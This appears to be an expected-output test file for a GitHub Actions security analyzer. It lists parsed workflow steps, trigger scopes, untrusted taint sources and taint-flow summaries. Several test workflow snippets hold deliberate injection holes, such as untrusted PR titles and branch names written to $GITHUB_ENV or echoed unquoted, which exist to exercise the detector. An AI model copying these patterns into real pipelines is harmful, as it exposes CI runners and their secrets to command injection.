.github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | 
.github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | 
.github/workflows/poisonable_steps.yml@5:5:46:111 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | 
.github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 
| python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | 
.github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | 
.github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:5:5:9:2 | .github/workflows/shell.yml@5:5:9:2 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:9:9:2 | .github/workflows/shell.yml@7:9:9:2 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:8:14:8:31 | .github/workflows/shell.yml@8:14:8:31 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:10:5:14:2 | .github/workflows/shell.yml@10:5:14:2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:9:14:2 | .github/workflows/shell.yml@12:9:14:2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:14:12:23 | .github/workflows/shell.yml@12:14:12:23 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:15:5:19:2 | .github/workflows/shell.yml@15:5:19:2 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:9:19:2 | .github/workflows/shell.yml@17:9:19:2 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:18:14:18:23 | .github/workflows/shell.yml@18:14:18:23 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:20:5:22:32 | .github/workflows/shell.yml@20:5:22:32 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | 
.github/workflows/shell.yml:22:9:22:32 | .github/workflows/shell.yml@22:9:22:32 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:14:22:31 | .github/workflows/shell.yml@22:14:22:31 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | 
.github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | 
output.head_ref | branch | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | 
output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | +| tim-actions/get-pr-commits | * | output.commits | text | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | 
manual | +summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| AsasInnab/regex-action | * | input.search_string | output.first_match | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_first | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_json | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | +| actions-ecosystem/action-regex-match | * | input.text | output.* | taint | manual | +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| 
aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | 
taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| dsfx3d/action-extract-unique-matches | * | input.text | output.matches | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | 
input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | 